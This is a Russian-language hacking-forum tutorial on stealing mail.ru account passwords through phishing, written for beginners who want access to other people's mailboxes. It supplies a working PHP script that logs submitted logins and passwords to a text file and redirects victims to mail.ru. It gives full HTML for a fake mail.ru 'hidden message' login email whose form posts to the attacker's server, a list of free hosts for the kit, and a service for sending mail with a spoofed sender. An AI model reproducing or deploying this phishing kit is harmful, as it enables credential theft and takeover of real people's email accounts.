Форум АНТИЧАТ - Взлом почты на mail.ru [СИ]

[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ;)", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP

Код:

km.ru 

nextmail.ru 

hobby.ru 

webrise.ru 

lapin.ru 

free.dl-hosting.ru 

hostow.net 

beplaced.ru 

777host.ru 

paltus.ru 

miraclehost.ru 

freebox.ru 

alfaspace.net 

k70.ru 

hosting.promostudio.ru 

chat.ru 

maxhost.ru 

nixup.com 

e2e.ru 

noka.ru 

newmail.ru 

boom.ru 

h15.ru 

hut.ru 

jino-net.ru 

pochta.ru 

unlimhost.ru 

onepage.ru 

by.ru 

sbn.bz 

yard.ru 

domainhosting.ru 

orthodoxy.ru 

webservis.ru 

ru-web.net 

activehost.ru 

househost.ru 

bestof.ru 

addr.ru 

hosting.dump.ru 

pesni.ru 

medbox.ru 

fatal.ru 

x5x.ru 

hopshot.com 

5gigs.com 

wagoo.com 

orgfree.com 

awardspace.com 

bobos.ca 

www.host.sk 

zportal.info 

spaceall.de 

3x.ro 

sretenie.ru 

dotgeek.org 

sevhosting.net 

o2g.net

www.jino-net.ru

www.nixup.com

newmail.ru

ho.com.ua/

wallSt.ru

hut.ru

holm.ru

e2e.ru

fatal.ru

host.sk

ut.ru

H1.ru

Hostmos.ru

Webm.ru

Rdcom.ru

narod.ru

front.ru

nm.ru 

chat.ru 

boom.ru 

by.ru

Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):

PHP код:


		
			
<?php

$f=fopen("mail.txt","at"); # файл куда сохранять

flock($f,2);

fputs($f,$_GET['Login']."@"); #логин

fputs($f,$_GET['Domain']); #домен

fputs($f,";".$_GET['Password']."\n"); # пароль

flock($f,3);

fclose($f);

?>

<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Рассмотрим скрипт поподробнее:

Код:

<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.

Сохраним в файл mes.php и зальем на хостинг.

Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777

Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:

PHP код:


		
			
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>

<td id=aj_body>

<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">

<table cellpadding=0 cellspacing=0 border=0 class=login>

<tr>

<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>

</tr>

</table><font color=00;33;66 FACE="Arial" >

<h4 >Авторизация</h4>

</font>

<table cellpadding=0 cellspacing=0 border=0 class=login>

<form method="GET" action="http://адресссайта/mes.php">

<input type="hidden" name="mail" value="1">

<tr>

<td width=75>

<img src=http://img.mail.ru/0.gif height=1><br>Имя

</td>

<td width=150>

<input type="text" name="Login">

</td>

<td width=75>

<select name="Domain">

<option value="mail.ru" SELECTED>@mail.ru</option>

<option value="inbox.ru">@inbox.ru</option>

<option value="list.ru" >@list.ru</option>

<option value="bk.ru" >@bk.ru</option>

</select>

</td>

</tr>

<tr>

<td>

Пароль

</td> 

<td>

<input type="password" name="Password">

</td>

<td>

<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>

</td>

</tr>



<tr> 

<td> </td>

<td>

<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>

</td>

<td> </td>

</tr>

<tr>

<td> </td>

<td>

<input type="Submit" value=" Войти " xstyle="margin-top:4px">

</td>

<td> </td>

</tr></form>

</table><br><br>

Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>

Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.

<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>

Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:

Цитата:

http://www.svkadr.ru/vr/conf/index.php?mail=1

Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!